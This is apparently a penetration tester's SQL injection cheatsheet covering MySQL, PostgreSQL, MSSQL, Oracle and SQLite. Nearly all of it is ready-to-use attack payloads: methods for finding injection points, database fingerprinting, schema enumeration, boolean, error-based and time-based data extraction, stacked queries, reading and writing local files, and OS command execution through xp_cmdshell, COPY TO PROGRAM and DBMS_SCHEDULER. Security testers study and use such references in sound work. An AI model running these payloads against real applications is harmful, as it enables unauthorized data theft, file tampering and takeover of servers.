SQL Injection Cheatsheet

This is an SQL injection cheatsheet with tried and true payloads / techniques that cover the 5 most popular database variants and their derivatives (MySQL, PostgreSQL, MSSQL/SQL Server, Oracle, SQLite).

Pronunciation Guide

How to pronounce “SQL” correctly. 😏

ESS CUE ELL ✔

SEE KWUHL ✘

SQUEAL ¯\_(ツ)_/¯

SQUIRREL 🐿️

SQUIRTLE 💦🐢

Avoiding OR <true> (OR 1=1)

With the exception of CTFs, injections involving an OR <true> expression (e.g. ' OR 1=1 -- -) should be avoided unless absolutely necessary.

I wrote about the reasons why in this article and spoke about them at length in this video.

If you have a “valid value”, there is practically no need for an OR <true> when doing SQL injections. A valid value is one which returns a “positive” result in the application, for example a search term that returns 1 or more results, an ID that maps to an actual resource (e.g. user, product, etc.), or a valid username.

Break & Repair Method

A simplistic but generally reliable method for finding basic SQL injections.

First, “break” the statement by injecting a single or double quote into an otherwise valid value (e.g. username=admin').

Then, replace the injected quote with each of the following “repairs” in turn, to see if one results in the original (uninjected) response:

Repair
' '
'\|\|'
'+'
' AND '1'='1
' -- -

In some cases, none of our “repairs” work because we are injecting into an integer value. In these cases, try the following repairs. Note that each one begins with a space:

Repair
-- -
AND 1=1
AND 1=1 -- -

For example, suppose that some search functionality exists where the search term shirt returns 23 results. Thus the valid value is shirt and the associated valid response is the page containing 23 results.

Appending a single quote to the search term shirt' breaks the SQL statement and now 0 results are returned. Note that this may also be because the search term shirt' is now invalid, but the “repair” process should determine this.

Replace the single quote with one of the “repairs”, for example shirt' '. This new search term once again returns 23 results. Since this matches the original valid response, it is highly likely that the search functionality suffers from SQL injection.

This could be confirmed by attempting a UNION injection attack, or by injecting two boolean payloads:

shirt' AND '1'='1

shirt' AND '1'='0

The first should return the original valid response (23 results), while the second should return 0 results.

Identifying Variants

Once a potential injection is found, the database variant (e.g. MySQL, PostgreSQL) can be identified by injecting these payloads in order until a positive result is returned:

Order	Payload	If Valid
1	AND 'foo' 'bar' = 'foobar'	MySQL
2	AND DATALENGTH('foo') = 3	MSSQL
3	AND TO_HEX(1) = '1'	PostgreSQL
4	AND LENGTHB('foo') = '3'	Oracle
5	AND GLOB('foo*', 'foobar') = 1	SQLite

Comments

This comment syntax can be used to add comments to SQL statements, useful for commenting out anything after an injection, as well as bypassing certain filters. Note that -- comments require a space after the -- to be valid, and /*comment*/ are in-line comments.

Variant	Syntax
MySQL	# comment
	-- comment
	/comment/
PostgreSQL	-- comment
PostgreSQL	/comment/
MSSQL	-- comment
MSSQL	/comment/
Oracle	-- comment
Oracle	/comment/
SQLite	-- comment
SQLite	/comment/

String Concatenation

These functions / operators can be used to concatenate two or more strings together.

Variant	Function / Operator
MySQL	'foo' 'bar'
MySQL	CONCAT('foo', 'bar')
PostgreSQL	'foo'\|\|'bar'
PostgreSQL	CONCAT('foo', 'bar')
MSSQL	'foo'+'bar'
MSSQL	CONCAT('foo', 'bar')
Oracle	'foo'\|\|'bar'
Oracle	CONCAT('foo', 'bar')
SQLite	'foo'\|\|'bar'
SQLite	CONCAT('foo', 'bar')

Substring

These functions can be used to select a substring of a string. The START value should be set to 1 (not 0) to start the substring from the first character.

Variant	Function
MySQL	SUBSTRING('foobar', START, LENGTH)
MySQL	SUBSTR('foobar', START, LENGTH)
PostgreSQL	SUBSTRING('foobar', START, LENGTH)
PostgreSQL	SUBSTR('foobar', START, LENGTH)
MSSQL	SUBSTRING('foobar', START, LENGTH)
Oracle	SUBSTR('foobar', START, LENGTH)
SQLite	SUBSTRING('foobar', START, LENGTH)
SQLite	SUBSTR('foobar', START, LENGTH)

Length

These functions count the length of strings, either in terms of bytes or characters (since some characters can have multiple bytes thanks to Unicode).

Variant	Function	Notes
MySQL	LENGTH('foo')	Counts number of bytes
MySQL	CHAR_LENGTH('foo')	Counts number of chars (inc. multi-byte chars)
PostgreSQL	LENGTH('foo')	Counts number of chars (inc. multi-byte chars)
MSSQL	DATALENGTH('foo')	Counts number of bytes
MSSQL	LEN('foo')	Counts number of chars (inc. multi-byte chars)
Oracle	LENGTHB('foo')	Counts number of bytes
Oracle	LENGTH('foo')	Counts number of chars (inc. multi-byte chars)
SQLite	LENGTH('foo')	Counts number of chars (inc. multi-byte chars)

Group Concatenation

These functions concatenate values from multiple rows of results into a single string.

Variant	Function
MySQL	GROUP_CONCAT(expression, 'DELIMITER')
PostgreSQL	STRING_AGG(expression, 'DELIMITER')
MSSQL	STRING_AGG(expression, 'DELIMITER')
Oracle	LISTAGG(expression, 'DELIMITER')
SQLite	GROUP_CONCAT(expression, 'DELIMITER')

Convert Characters to Integers for Comparisons

Useful for blind SQL injections to determine the range a character falls in. Note that MySQL and Oracle's functions output a hexadecimal number, while the others output a decimal.

Variant	Function	Output
MySQL	HEX('a')	61
PostgreSQL	ASCII('a')	97
MSSQL	UNICODE('a')	97
Oracle	RAWTOHEX('a')	61
SQLite	UNICODE('a')	97

Limiting & Offsetting Queries

Syntax for limiting the query results to a certain number of rows, as well as offsetting the starting row.

Variant	Limit Query Result to 1 Row	Limit to 1 Row, Starting at Row 5
MySQL	SELECT * FROM users LIMIT 1	SELECT * FROM users LIMIT 4, 1
MySQL	SELECT * FROM users LIMIT 1	SELECT * FROM users LIMIT 1 OFFSET 4
PostgreSQL	SELECT * FROM users LIMIT 1	SELECT * FROM users LIMIT 1 OFFSET 4
MSSQL	SELECT * FROM users ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY	SELECT * FROM users ORDER BY 1 OFFSET 4 ROWS FETCH NEXT 1 ROWS ONLY
Oracle >= v12	SELECT * FROM users FETCH NEXT 1 ROWS ONLY	SELECT * FROM users OFFSET 4 ROWS FETCH NEXT 1 ROWS ONLY
Oracle <= v11	SELECT * FROM users WHERE ROWNUM = 1	SELECT * FROM users WHERE ROWNUM = 5
SQLite	SELECT * FROM users LIMIT 1	SELECT * FROM users LIMIT 4, 1
SQLite	SELECT * FROM users LIMIT 1	SELECT * FROM users LIMIT 1 OFFSET 4

Database Version

Functions and operators that provide the version information of the database.

Variant	Function / Operator
MySQL	@@VERSION
	VERSION()
	@@GLOBAL.VERSION
PostgreSQL	VERSION()
MSSQL	@@VERSION
Oracle	SELECT BANNER FROM v$version WHERE ROWNUM = 1
Oracle	SELECT BANNER FROM gv$version WHERE ROWNUM = 1
SQLite	sqlite_version()

Current Database / Schema

Queries which return the currently selected database / schema.

Variant	Query
MySQL	SELECT DATABASE()
PostgreSQL	SELECT CURRENT_DATABASE()
PostgreSQL	SELECT CURRENT_SCHEMA()
MSSQL	SELECT DB_NAME()
MSSQL	SELECT SCHEMA_NAME()
Oracle	SELECT name FROM V$database
	SELECT * FROM global_name
	SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;
SQLite	N/A

List Databases

Queries which return a list of all databases / schemas.

Variant	Query
MySQL	SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA
MySQL	SELECT db FROM mysql.db
PostgreSQL	SELECT datname FROM pg_database
PostgreSQL	SELECT DISTINCT(schemaname) FROM pg_tables
MSSQL	SELECT name FROM master.sys.databases
MSSQL	SELECT name FROM master..sysdatabases
Oracle	SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)
SQLite	N/A

List Tables

Queries which return a list of all tables in a given database / schema.

Variant	Query
MySQL	SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='[DBNAME]'
MySQL	SELECT database_name,table_name FROM mysql.innodb_table_stats WHERE database_name='[DBNAME]'
PostgreSQL	SELECT tablename FROM pg_tables WHERE schemaname = '[SCHEMA_NAME]'
PostgreSQL	SELECT table_name FROM information_schema.tables WHERE table_schema='[SCHEMA_NAME]'
MSSQL	SELECT table_name FROM information_schema.tables WHERE table_catalog='[DBNAME]'
MSSQL	SELECT name FROM [DBNAME]..sysobjects WHERE xtype='U'
Oracle	SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='[DBNAME]'
SQLite	SELECT tbl_name FROM sqlite_master WHERE type='table'

List Columns

Queries which return a list of all columns in a given table & database / schema pair.

Variant	Query
MySQL	SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='[TABLE_NAME]' AND table_schema='[DBNAME]'
PostgreSQL	SELECT column_name,data_type FROM information_schema.columns WHERE table_schema='[DBNAME]' AND table_name='[TABLE_NAME]'
MSSQL	SELECT COL_NAME(OBJECT_ID('[DBNAME].[TABLE_NAME]'), [INDEX])
Oracle	SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='[TABLE_NAME]' AND OWNER='[DBNAME]'
SQLite	SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='[TABLE_NAME]'
SQLite	SELECT name FROM PRAGMA_TABLE_INFO('[TABLE_NAME]')

Boolean Error Inferential Exploitation

Payloads which cause an error in the SQL if the 1=1 conditional is true. Replace the 1=1 with a condition you want to test; if an error propagates back to the response in some measurable way (e.g. 500 Internal Server Error), then the condition is true.

Variant	Payload
MySQL	AND 1=(SELECT IF(1=1,(SELECT table_name FROM information_schema.tables),1))
PostgreSQL	AND 1=(SELECT CASE WHEN (1=1) THEN CAST(1/0 AS INTEGER) ELSE 1 END)
MSSQL	AND 1=(SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END)
Oracle	AND 1=(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '1' END FROM dual)
SQLite	AND 1=(SELECT CASE WHEN (1=1) THEN load_extension(1) ELSE 1 END)
SQLite	AND 1=(SELECT CASE WHEN (1=1) THEN abs(-9223372036854775808) ELSE 1 END)

Error Based Exploitation

These injection payloads should cause a database error and return the version information of the database variant within that error.

MySQL

Payload
AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -
AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -
AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -
AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -
OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -
AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -

PostgreSQL

Payload
AND 1337=CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC) -- -
AND (CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC)) -- -
AND CAST((SELECT version()) AS INT)=1337 -- -
AND (SELECT version())::int=1 -- -

MSSQL

Payload
AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~')) -- -
AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~')) -- -
AND 1337=CONCAT('~',(SELECT @@version),'~') -- -

Oracle

Payload
AND 1337=(SELECT UPPER(XMLType(CHR(60)\|\|CHR(58)\|\|'~'\|\|(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))\|\|'~'\|\|CHR(62))) FROM DUAL) -- -
AND 1337=UTL_INADDR.GET_HOST_ADDRESS('~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -
AND 1337=CTXSYS.DRITHSX.SN(1337,'~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -
AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -

Time Based Exploitation

Simple Time Based Injections

Note that these injection payloads are inherently dangerous as the sleep function may execute multiple times. They will cause the database to sleep for 10 seconds per row evaluated by the query.

These should only be used if you are certain only one row is going to be evaluated by the query you are injecting into.

Variant	Payload
MySQL	AND SLEEP(10)=0
PostgreSQL	AND 'RANDSTR'\|\|PG_SLEEP(10)='RANDSTR'
MSSQL	AND 1337=(CASE WHEN (1=1) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1337 END)
Oracle	AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END)
SQLite	AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))

Complex Time Based Injections

These injection payloads are “safe” and should only ever sleep (for 10 seconds) once per statement. Replace the 1=1 with a condition you want to test; if a delay of 10 seconds occurs, then the condition is true.

Variant	Payload
MySQL	AND (SELECT 1337 FROM (SELECT(SLEEP(10-(IF((1=1),0,10))))) RANDSTR)
PostgreSQL	AND 1337=(CASE WHEN (1=1) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1337 END)
MSSQL	AND 1337=(CASE WHEN (1=1) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1337 END)
Oracle	AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END)
SQLite	AND 1337=(CASE WHEN (1=1) THEN (SELECT 1337 FROM (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))))) ELSE 1337 END)

Stack Based Injection

Generally if stack based injection is supported, it is only detectable by causing a time based delay. These injection payloads should cause a delay of 10 seconds:

Variant	Payload
MySQL	; SLEEP(10) -- -
PostgreSQL	; PG_SLEEP(10) -- -
MSSQL	; WAITFOR DELAY '0:0:10' -- -
Oracle	; DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) -- -
SQLite	; RANDOMBLOB(1000000000/2) -- -

These injection payloads should cause a delay of 10 seconds if the 1=1 conditional is true. Replace the 1=1 with a condition you want to test; if a delay of 10 seconds occurs, then the condition is true.

Variant	Payload
MySQL	; SELECT IF((1=1),SLEEP(10),1337)
PostgreSQL	; SELECT (CASE WHEN (1=1) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1337 END)
MSSQL	; IF(1=1) WAITFOR DELAY '0:0:10'
Oracle	; SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END FROM DUAL
SQLite	; SELECT (CASE WHEN (1=1) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))) ELSE 1337 END)

Reading Local Files

These functions read the contents of local files. The Oracle method can only occur if stacked injections are possible. SQLite's readfile is not a core function.

Variant	Function
MySQL	LOAD_FILE('/path/to/file')
PostgreSQL	PG_READ_FILE('/path/to/file')
MSSQL	OPENROWSET(BULK 'C:\path\to\file', SINGLE_CLOB)
Oracle	utl_file.get_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
SQLite	readfile('/path/to/file')

Writing Local Files

These statements write content to a local file. The PostgreSQL, MSSQL, and Oracle methods can only occur if stacked injections are possible. MSSQL requires the “Ole Automation Procedures” to be enabled.

Variant	Statement
MySQL	SELECT 'contents' INTO OUTFILE '/path/to/file'
PostgreSQL	COPY (SELECT 'contents') TO '/path/to/file'
MSSQL	execute spWriteStringToFile 'contents', 'C:\path\to\', 'file'
Oracle	utl_file.put_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
SQLite	SELECT writefile('/path/to/file', column_name) FROM table_name

Executing OS Commands

These statements execute local OS commands. The PostgreSQL, MSSQL, and 2nd Oracle methods can only occur if stacked injections are possible. The 1st Oracle method requires the OS_Command package.

Variant	Statement
MySQL	Not Possible
PostgreSQL	COPY (SELECT '') to program '<command>'
MSSQL	EXEC xp_cmdshell '<command>'
Oracle	select os_command.exec_clob('<command>') cmd from dual
Oracle	DBMS_SCHEDULER.CREATE_JOB (job_name => 'exec', job_type => 'EXECUTABLE', job_action => '<command>', enabled => TRUE)
SQLite	Not Possible

References

The vast majority of the information comprised here came from my own research / experimentation with various injections and database variants. However several payloads were either taken from, or based on those found in the popular SQL injection tool SQLmap.